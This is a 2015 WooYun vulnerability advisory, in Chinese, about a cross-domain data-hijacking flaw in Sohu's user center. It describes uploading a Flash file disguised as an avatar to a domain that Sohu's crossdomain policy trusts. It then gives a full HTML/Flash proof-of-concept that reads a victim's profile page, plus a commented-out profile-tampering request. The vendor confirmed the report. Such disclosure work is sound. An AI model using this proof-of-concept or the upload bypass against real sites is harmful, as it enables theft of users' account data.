当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116281

漏洞标题:搜狐劫持任意用户#2(需交互)

相关厂商:搜狐

漏洞作者: jeary

提交时间:2015-05-26 16:35

修复时间:2015-07-10 16:42

公开时间:2015-07-10 16:42

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-26: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-06-05: 细节向核心白帽子及相关领域专家公开
2015-06-15: 细节向普通白帽子公开
2015-06-25: 细节向实习白帽子公开
2015-07-10: 细节向公众公开

简要描述:

这次不是搜狐视频,是搜狐的用户

详细说明:

求送小狐狸~~
还是来看过程吧.

00.jpg


很可惜,搜狐的用户中心并没有直接向上次那样设置*,但是这无法阻挡跨站师的脚步
我们只需要让flash在它自己域即可

*.sohu.com
*.sohu.com.cn
*.itc.cn


于是开始找上传.
http://i.sohu.com/profile/home/swfUploadIcon.htm(修改资料上传头像)

02.jpg


然后发现运气并没有这么好,上传失败,应该是验证了文件内容,没有发现图片头信息

03.jpg


然后..

04.jpg


这次上传成功了,得到这样一个地址,你没看错,它就在crossdomain所配置的信任域里

http://sucimg.itc.cn/avatarimg/s_247083258_1432619329154_c175


然后访问之,结果下载了,我还以为不能用,果断下载回来对比一下原文件,发现是一样的
然后构造POC请求用户的资料页面:

<html>
<head><title>csrftest</title>
<script>
function Connection(Sendtype,url,content,callback){
	if (window.XMLHttpRequest){
		var xmlhttp=new XMLHttpRequest();
	}
	else{
		var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
	} 
	xmlhttp.onreadystatechange=function(){
		if(xmlhttp.readyState==4&&xmlhttp.status==200)
		{
			callback(xmlhttp.responseText);
		}
	}
	xmlhttp.open(Sendtype,url,true);
	xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    xmlhttp.withCredentials = "true";
	xmlhttp.send(content);
}
  
function sendToJavaScript(strData){
    var theDiv = document.getElementById("HijackedData");
    var content = document.createTextNode(strData);
    theDiv.appendChild(content);
    theDiv.innerHTML += '<br/>'
    //var posturl = "";
    //var postdata= "detaildesc=hack"; 
    //Connection("POST",posturl,postdata,function(callback){});
   
}
</script>
</head>
<body>
<div id=HijackedData></div>
<object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://sucimg.itc.cn/avatarimg/s_247083258_1432619329154_c175">
<param name="AllowScriptAccess" value="always">
<param name="flashvars" value="input=http://i.sohu.com/v2/profile/home/basic.htm">
</object>
</body>
</html>


漏洞证明:

05.jpg


然后就没有然后了

修复方案:

摩擦摩擦.

版权声明:转载请注明来源 jeary@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-26 16:40

厂商回复:

感谢支持

最新状态:

暂无